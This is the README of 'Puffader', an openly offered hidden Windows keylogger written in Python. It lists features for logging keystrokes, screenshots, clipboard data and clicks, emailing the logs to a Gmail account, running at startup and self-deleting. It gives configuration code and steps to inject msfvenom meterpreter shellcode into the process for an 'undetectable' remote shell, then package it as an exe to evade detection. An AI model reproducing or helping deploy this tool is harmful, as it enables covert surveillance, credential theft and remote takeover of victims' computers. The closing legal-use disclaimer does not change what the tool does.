Puffader is an opensource, hidden and undetectable keylogger for windows written in Python 2.7 which can also capture screenshots, mouse window clicks and clipboard data.

Puffader Requires:

• Python 2.7
• Pyhook
• Pywin32
• PyAutoGui

Please refer to the wiki for more information on installing prerequisites.

The program can be downloaded via github or git eg. git clone https://github.com/xp4xbox/Puffader

Currently Puffader has several features such as:

• Ability to send logs to any gmail account.
• Ability to capture screenshots
• Ability to store logs locally
• Ability to configure log size before sending
• Ability to send logs at timed intervals
• Ability to stop the program via ctrl-rshift-lshift-h.
• Ability to log special characters.
• Ability to embed an undetectable meterpreter shell
• Ability to capture window mouse clicks
• Ability to run at startup
• Ability to capture clipboard data
• Ability to melt file on execution
• Checking for multiple instances
• And more...

1. Open file with idle or any other editor.
2. Modifiy lines 18-37 for your personal preference: eg.

strEmailAc = "[email protected]"
strEmailPass = "pass"

intCharPerSend = 1000

blnUseTime = "False"
intTimePerSend = 120

blnStoreLocal = "True"
strLogFile = "c:/temp/test.txt"

blnScrShot = "True"
strScrDir = "c:/temp"
intScrTime = 120

blnLogClick = "True"
blnAddToStartup = "False"

blnLogClipboard = "False"
blnMelt = "False"

NOTE: For strScrDir, be sure to leave out the last /.

For more information please refer to the wiki.

1. (Optional) Add this code to Puffader.py sys.stderr = None after the import statements to ensure no errors will show.
2. Install Py2Exe.
3. Make sure the program is called Puffader.py in your python folder as well.
4. Run python setup.py
5. You should see the .exe in the dist folder.

Or refer to the wiki for more information.

1. Generate raw shellcode using msfvenom (eg. xr8\x02...).
2. Encode the shellcode to base64 by using this.
3. Move the code_injector module to same dir as the program.
4. Paste in this code after the function to prevent multiple instances as here. Setting b64shellcode to be your encrypted shellcode.

import code_injector, base64
# base64 shellcode
b64shellcode = ""
shellcode = base64.b64decode(b64shellcode)  # decrypt shellcode
pid = os.getpid()  # get current pid

code_injector.InjectShellCode(pid, shellcode)  # inject the shellcode into the program

5. Build program with Py2Exe.

Check my other project PyEvade for more info on how this works.

If you need any help at all, feel free to post a "help" issue.

Contributing is encouraged and will help make a better program. Please refer to this before contributing.

This program must be used for legal purposes! I am not responsible for anything you do with it.

License